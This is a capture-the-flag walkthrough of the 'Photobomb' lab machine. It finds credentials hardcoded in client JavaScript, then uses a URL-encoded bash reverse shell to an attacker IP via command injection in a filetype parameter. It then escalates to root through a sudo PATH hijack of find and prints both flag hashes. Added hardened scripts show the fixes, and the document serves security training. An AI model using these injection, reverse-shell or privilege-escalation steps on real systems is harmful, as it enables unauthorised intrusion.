Port recognition with nmap

┌──(root@ghost)-[/home/ghost]
└─# nmap photobomb.htb --min-rate 5000 -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-16 13:26 EDT
Nmap scan report for photobomb.htb (10.10.11.182)
Host is up (0.14s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 18.42 seconds

nmap reports two open ports, SSH and HTTP.

┌──(root@ghost)-[/home/ghost]
└─# wfuzz -c --hc=404 -t 100 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt http://photobomb.htb/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://photobomb.htb/FUZZ
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                            
=====================================================================
                                                                              
000000489:   401        7 L      12 W       188 Ch      "printer"                                                                                                                          
000001227:   401        7 L      12 W       188 Ch      "printers"                                                                                                                         
000004295:   401        7 L      12 W       188 Ch      "printerfriendly"                                                                                                                  
000008558:   401        7 L      12 W       188 Ch      "printer_friendly"                                                                                                                 
000013496:   401        7 L      12 W       188 Ch      "printer_icon"                                                                                                                     
000015253:   401        7 L      12 W       188 Ch      "printer-icon"                                                                                                                     
000015485:   401        7 L      12 W       188 Ch      "printer-friendly"                                                                                                                 
000021900:   401        7 L      12 W       188 Ch      "printerFriendly"                                                                                                                  
000045240:   200        22 L     95 W       843 Ch      "http://photobomb.htb/"                                                                                                            
000047897:   401        7 L      12 W       188 Ch      "printersupplies"                                                                                                                  
000051765:   401        7 L      12 W       188 Ch      "printer1"                                                                                                                         
000052471:   401        7 L      12 W       188 Ch      "printer2"                                                                                                                         
000084465:   401        7 L      12 W       188 Ch      "printericon"                                                                                                                      
000105794:   401        7 L      12 W       188 Ch      "printer_2867"                                                                                                                     
000112086:   401        7 L      12 W       188 Ch      "printer_securit"                                                                                                                  
000154189:   401        7 L      12 W       188 Ch      "printer_drivers"                                                                                                                  
000159305:   401        7 L      12 W       188 Ch      "printer_2"                                                                                                                        
000192008:   401        7 L      12 W       188 Ch      "printer_list"                                                                                                                     
000203184:   401        7 L      12 W       188 Ch      "printerdrivers"                                                                                                                   
000208002:   401        7 L      12 W       188 Ch      "printer-ink"                                                                                                                      

Total time: 0
Processed Requests: 220560
Filtered Requests: 220526
Requests/sec.: 0

┌──(root@ghost)-[/home/ghost]
└─# curl http://photobomb.htb
<!DOCTYPE html>
<html>
<head>
  <title>Photobomb</title>
  <link type="text/css" rel="stylesheet" href="styles.css" media="all" />
  <script src="photobomb.js"></script>
</head>
<body>
  <div id="container">
    <header>
      <h1><a href="/">Photobomb</a></h1>
    </header>
    <article>
      <h2>Welcome to your new Photobomb franchise!</h2>
      <p>You will soon be making an amazing income selling premium photographic gifts.</p>
      <p>This state of-the-art web application is your gateway to this fantastic new life. Your wish is its command.</p>
      <p>To get started, please <a href="/printer" class="creds">click here!</a> (the credentials are in your welcome pack).</p>
      <p>If you have any problems with your printer, please call our Technical Support team on 4 4283 77468377.</p>
    </article>
  </div>
</body>
</html>

After inspecting the page source we found photobomb.js, which is worth reading.

┌──(root@ghost)-[/home/ghost]
└─# curl http://photobomb.htb/photobomb.js
function init() {
  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
  if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {
    document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:b0Mb!@photobomb.htb/printer');
  }
}
window.onload = init;

Credentials found: user pH0t0 and password b0Mb! (hardcoded in client-side JavaScript, so anyone who fetches the script can read them).

We need to intercept the request with Burp Suite to see what happens when we click the "download photo to print" button.

Let's test whether appending a semicolon to the filetype parameter lets us execute commands, by sending a ping to our machine.

We receive it, so the parameter is passed to a shell unsanitised; let's try to get a shell.

Our payload looks like this:

photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg;bash%20-c%20%27bash%20-i%20>%26%20/dev/tcp/10.10.14.142/1337%200>%261%27%26&dimensions=3000x2000

┌──(root@ghost)-[/home/ghost]
└─# nc -lvp 1337
listening on [any] 1337 ...
connect to [10.10.14.142] from photobomb.htb [10.10.11.182] 45828
bash: cannot set terminal process group (723): Inappropriate ioctl for device
bash: no job control in this shell
wizard@photobomb:~/photobomb$ cat /home/wizard/user.txt
0d42366432da822cff563ded442b9646
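The injection works because the filetype value is dropped into a shell command line without validation. As an added example (not the Photobomb application's code; the converter path and argument layout are assumptions), this is the server-side allowlist check and argv-style invocation that would have rejected the payload:

```shell
#!/bin/sh
# Added example, not the Photobomb app's own code: validate the three form
# fields before they are used to build an image-conversion command, and never
# hand user input to a shell (no eval, no "sh -c" with a concatenated string).

# Return 0 if every field matches a strict allowlist, 1 otherwise.
validate_params() {
  photo=$1 filetype=$2 dimensions=$3
  # photo: a bare filename, no path separators, no shell metacharacters
  printf '%s' "$photo" | grep -Eq '^[A-Za-z0-9_-]+\.(jpg|png)$' || return 1
  # filetype: exactly one of the supported formats
  case $filetype in jpg|png) ;; *) return 1 ;; esac
  # dimensions: WIDTHxHEIGHT, digits only, bounded length
  printf '%s' "$dimensions" | grep -Eq '^[0-9]{1,5}x[0-9]{1,5}$' || return 1
  return 0
}

# Build the converter argv as separate words (hypothetical converter path) and
# print them instead of executing, so the example runs offline.
build_command() {
  validate_params "$1" "$2" "$3" || { echo "rejected"; return 1; }
  printf '%s\n' "/usr/bin/convert" "source_images/$1" "-resize" "$3" "/tmp/out.$2"
}

# Constructed samples: the legitimate request, then a filetype carrying an
# appended command of the kind used above (benign "id" stands in for it).
build_command "voicu-apostol-MWER49YaD-M-unsplash.jpg" "jpg" "3000x2000"
build_command "voicu-apostol-MWER49YaD-M-unsplash.jpg" "jpg;id" "3000x2000" || true
```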

After forwarding the request we are on the system as the wizard user; time to privesc.

wizard@photobomb:~/photobomb$ sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh

wizard@photobomb:~/photobomb$ cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

As we can see, the last find command is not called by its absolute path, and the sudo rule grants SETENV, so we can supply our own PATH and have root run a find of our choosing.

wizard@photobomb:~/photobomb$ echo '/bin/bash' > /tmp/find;chmod +x /tmp/find;sudo PATH=/tmp:$PATH /opt/cleanup.sh
whoami
root
cat /root/root.txt
e33b84a2e9104d5d04f1f186359ad12e
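As an added example, not the box's own /opt/cleanup.sh, here is a hardened rewrite that pins PATH and calls every binary by absolute path, exercised against a rogue find placed in a caller-supplied PATH; the scratch tree, the working-directory parameter and the unprivileged guard around chown are constructed for the demo:

```shell
#!/bin/sh
# Added example, not /opt/cleanup.sh from the box. Two changes close the
# privesc: PATH is pinned to system directories before any command runs, so a
# caller-supplied PATH (sudo SETENV) cannot redirect lookups, and every external
# command is invoked by absolute path anyway. The sudoers entry should also drop
# SETENV, i.e. "(root) NOPASSWD: /opt/cleanup.sh".

cleanup_hardened() {
  PATH=/usr/sbin:/usr/bin:/sbin:/bin
  export PATH
  cd "$1" || return 1          # working directory passed in for the demo

  # clean up log files (same logic as the original: skip empty logs and symlinks)
  if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]; then
    /bin/cat log/photobomb.log > log/photobomb.log.old
    /usr/bin/truncate -s0 log/photobomb.log
  fi

  # protect the priceless originals; chown only succeeds as root, so the demo
  # guards it and otherwise skips this step
  if [ "$(/usr/bin/id -u)" -eq 0 ]; then
    /usr/bin/find source_images -type f -name '*.jpg' -exec /bin/chown root:root {} \;
  fi
}

# Constructed scratch tree plus a rogue "find" that leaves a marker if it runs.
setup_demo() {
  base=$(mktemp -d)
  mkdir -p "$base/work/log" "$base/work/source_images" "$base/rogue"
  printf 'request 1\nrequest 2\n' > "$base/work/log/photobomb.log"
  : > "$base/work/source_images/a.jpg"
  printf '#!/bin/sh\ntouch "%s/PWNED"\n' "$base" > "$base/rogue/find"
  chmod +x "$base/rogue/find"
  printf '%s\n' "$base"
}

# Return 0 if the rogue find never executed and the log was rotated correctly.
demo_ok() {
  base=$(setup_demo)
  # mimics "sudo PATH=/tmp:$PATH /opt/cleanup.sh" from the writeup
  ( PATH="$base/rogue:$PATH" cleanup_hardened "$base/work" )
  [ ! -e "$base/PWNED" ] \
    && [ -s "$base/work/log/photobomb.log.old" ] \
    && [ ! -s "$base/work/log/photobomb.log" ]
}
```

Run demo_ok to confirm the rogue binary is ignored; swap the pinned PATH line out and change /usr/bin/find back to a bare find to watch the marker file appear.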